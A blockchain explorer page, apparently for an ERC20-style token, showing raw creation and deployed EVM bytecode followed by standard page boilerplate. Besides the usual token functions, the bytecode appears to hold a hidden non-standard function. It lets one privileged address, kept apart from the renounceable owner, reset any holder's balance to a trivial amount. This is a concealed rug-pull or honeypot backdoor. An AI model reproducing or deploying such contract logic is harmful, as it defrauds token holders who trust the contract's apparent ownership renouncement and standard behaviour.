19055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c3b919061116e565b60405180910390a3505050565b6000610c54848461082a565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610cce5781811015610cc0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb79061166d565b60405180910390fd5b610ccd8484848403610a7f565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d43576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3a906116ff565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610db2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da990611791565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e39576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3090611823565b60405180910390fd5b8181610e459190611843565b600760008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610eda82600760008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f8890919063ffffffff16565b600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f7a919061116e565b60405180910390a350505050565b60008183610f969190611339565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610fd8578082015181840152602081019050610fbd565b60008484015250505050565b6000601f19601f8301169050919050565b600061100082610f9e565b61100a8185610fa9565b935061101a818560208601610fba565b61102381610fe4565b840191505092915050565b600060208201905081810360008301526110488184610ff5565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061108082611055565b9050919050565b61109081611075565b811461109b57600080fd5b50565b6000813590506110ad81611087565b92915050565b6000819050919050565b6110c6816110b3565b81146110d157600080fd5b50565b6000813590506110e3816110bd565b92915050565b60008060408385031215611100576110ff611050565b5b600061110e8582860161109e565b925050602061111f858286016110d4565b9150509250929050565b60008115159050919050565b61113e81611129565b82525050565b60006020820190506111596000830184611135565b92915050565b611168816110b3565b82525050565b6000602082019050611183600083018461115f565b92915050565b60006020828403121561119f5761119e611050565b5b60006111ad8482850161109e565b91505092915050565b6000806000606084860312156111cf576111ce611050565b5b60006111dd8682870161109e565b93505060206111ee8682870161109e565b92505060406111ff868287016110d4565b9150509250925092565b600060ff82169050919050565b61121f81611209565b82525050565b600060208201905061123a6000830184611216565b92915050565b61124981611075565b82525050565b60006020820190506112646000830184611240565b92915050565b6000806040838503121561128157611280611050565b5b600061128f8582860161109e565b92505060206112a08582860161109e565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806112f157607f821691505b602082108103611304576113036112aa565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611344826110b3565b915061134f836110b3565b92508282019050808211156113675761136661130a565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006113a3602083610fa9565b91506113ae8261136d565b602082019050919050565b600060208201905081810360008301526113d281611396565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611435602583610fa9565b9150611440826113d9565b604082019050919050565b6000602082019050818103600083015261146481611428565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006114c7602683610fa9565b91506114d28261146b565b604082019050919050565b600060208201905081810360008301526114f6816114ba565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611559602483610fa9565b9150611564826114fd565b604082019050919050565b600060208201905081810360008301526115888161154c565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006115eb602283610fa9565b91506115f68261158f565b604082019050919050565b6000602082019050818103600083015261161a816115de565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611657601d83610fa9565b915061166282611621565b602082019050919050565b600060208201905081810360008301526116868161164a565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006116e9602583610fa9565b91506116f48261168d565b604082019050919050565b60006020820190508181036000830152611718816116dc565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061177b602383610fa9565b91506117868261171f565b604082019050919050565b600060208201905081810360008301526117aa8161176e565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061180d602683610fa9565b9150611818826117b1565b604082019050919050565b6000602082019050818103600083015261183c81611800565b9050919050565b600061184e826110b3565b9150611859836110b3565b92508282039050818111156118715761187061130a565b5b9291505056fea26469706673582212200363e7d29c5b9680a2fb9626b449443f70e031ba9437a1a5fa2249890a3becbc64736f6c63430008130033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d714610276578063a9059cbb146102a6578063dd62ed3e146102d6578063f2fde38b14610306576100f5565b806370a0823114610200578063715018a6146102305780638da5cb5b1461023a57806395d89b4114610258576100f5565b80631ae0d5c8116100d35780631ae0d5c81461016657806323b872dd14610182578063313ce567146101b257806339509351146101d0576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610322565b60405161010f919061102e565b60405180910390f35b610132600480360381019061012d91906110e9565b6103b4565b60405161013f9190611144565b60405180910390f35b6101506103d7565b60405161015d919061116e565b60405180910390f35b610180600480360381019061017b9190611189565b6103e1565b005b61019c600480360381019061019791906111b6565b6104c4565b6040516101a99190611144565b60405180910390f35b6101ba6104f3565b6040516101c79190611225565b60405180910390f35b6101ea60048036038101906101e591906110e9565b6104fc565b6040516101f79190611144565b60405180910390f35b61021a60048036038101906102159190611189565b610533565b604051610227919061116e565b60405180910390f35b61023861057c565b005b6102426106d4565b60405161024f919061124f565b60405180910390f35b6102606106fe565b60405161026d919061102e565b60405180910390f35b610290600480360381019061028b91906110e9565b610790565b60405161029d9190611144565b60405180910390f35b6102c060048036038101906102bb91906110e9565b610807565b6040516102cd9190611144565b60405180910390f35b6102f060048036038101906102eb919061126a565b61082a565b6040516102fd919061116e565b60405180910390f35b610320600480360381019061031b9190611189565b6108b1565b005b606060048054610331906112d9565b80601f016020809104026020016040519081016040528092919081815260200182805461035d906112d9565b80156103aa5780601f1061037f576101008083540402835291602001916103aa565b820191906000526020600020905b81548152906001019060200180831161038d57829003601f168201915b5050505050905090565b6000806103bf610a77565b90506103cc818585610a7f565b600191505092915050565b6000600554905090565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461047b57600760008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461047e565b60045b600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b6000806104cf610a77565b90506104dc858285610c48565b6104e7858585610cd4565b60019150509392505050565b60006009905090565b600080610507610a77565b9050610528818585610519858961082a565b6105239190611339565b610a7f565b600191505092915050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610584610a77565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610613576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161060a906113b9565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606003805461070d906112d9565b80601f0160208091040260200160405190810160405280929190818152602001828054610739906112d9565b80156107865780601f1061075b57610100808354040283529160200191610786565b820191906000526020600020905b81548152906001019060200180831161076957829003601f168201915b5050505050905090565b60008061079b610a77565b905060006107a9828661082a565b9050838110156107ee576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107e59061144b565b60405180910390fd5b6107fb8286868403610a7f565b60019250505092915050565b600080610812610a77565b905061081f818585610cd4565b600191505092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6108b9610a77565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610948576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161093f906113b9565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109b7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ae906114dd565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610aee576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae59061156f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b5d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5490611601565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c3b919061116e565b60405180910390a3505050565b6000610c54848461082a565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610cce5781811015610cc0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb79061166d565b60405180910390fd5b610ccd8484848403610a7f565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d43576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3a906116ff565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610db2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da990611791565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e39576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3090611823565b60405180910390fd5b8181610e459190611843565b600760008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610eda82600760008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f8890919063ffffffff16565b600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f7a919061116e565b60405180910390a350505050565b60008183610f969190611339565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610fd8578082015181840152602081019050610fbd565b60008484015250505050565b6000601f19601f8301169050919050565b600061100082610f9e565b61100a8185610fa9565b935061101a818560208601610fba565b61102381610fe4565b840191505092915050565b600060208201905081810360008301526110488184610ff5565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061108082611055565b9050919050565b61109081611075565b811461109b57600080fd5b50565b6000813590506110ad81611087565b92915050565b6000819050919050565b6110c6816110b3565b81146110d157600080fd5b50565b6000813590506110e3816110bd565b92915050565b60008060408385031215611100576110ff611050565b5b600061110e8582860161109e565b925050602061111f858286016110d4565b9150509250929050565b60008115159050919050565b61113e81611129565b82525050565b60006020820190506111596000830184611135565b92915050565b611168816110b3565b82525050565b6000602082019050611183600083018461115f565b92915050565b60006020828403121561119f5761119e611050565b5b60006111ad8482850161109e565b91505092915050565b6000806000606084860312156111cf576111ce611050565b5b60006111dd8682870161109e565b93505060206111ee8682870161109e565b92505060406111ff868287016110d4565b9150509250925092565b600060ff82169050919050565b61121f81611209565b82525050565b600060208201905061123a6000830184611216565b92915050565b61124981611075565b82525050565b60006020820190506112646000830184611240565b92915050565b6000806040838503121561128157611280611050565b5b600061128f8582860161109e565b92505060206112a08582860161109e565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806112f157607f821691505b602082108103611304576113036112aa565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611344826110b3565b915061134f836110b3565b92508282019050808211156113675761136661130a565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006113a3602083610fa9565b91506113ae8261136d565b602082019050919050565b600060208201905081810360008301526113d281611396565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611435602583610fa9565b9150611440826113d9565b604082019050919050565b6000602082019050818103600083015261146481611428565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006114c7602683610fa9565b91506114d28261146b565b604082019050919050565b600060208201905081810360008301526114f6816114ba565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611559602483610fa9565b9150611564826114fd565b604082019050919050565b600060208201905081810360008301526115888161154c565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006115eb602283610fa9565b91506115f68261158f565b604082019050919050565b6000602082019050818103600083015261161a816115de565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611657601d83610fa9565b915061166282611621565b602082019050919050565b600060208201905081810360008301526116868161164a565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006116e9602583610fa9565b91506116f48261168d565b604082019050919050565b60006020820190508181036000830152611718816116dc565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061177b602383610fa9565b91506117868261171f565b604082019050919050565b600060208201905081810360008301526117aa8161176e565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061180d602683610fa9565b9150611818826117b1565b604082019050919050565b6000602082019050818103600083015261183c81611800565b9050919050565b600061184e826110b3565b9150611859836110b3565b92508282039050818111156118715761187061130a565b5b9291505056fea26469706673582212200363e7d29c5b9680a2fb9626b449443f70e031ba9437a1a5fa2249890a3becbc64736f6c63430008130033
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.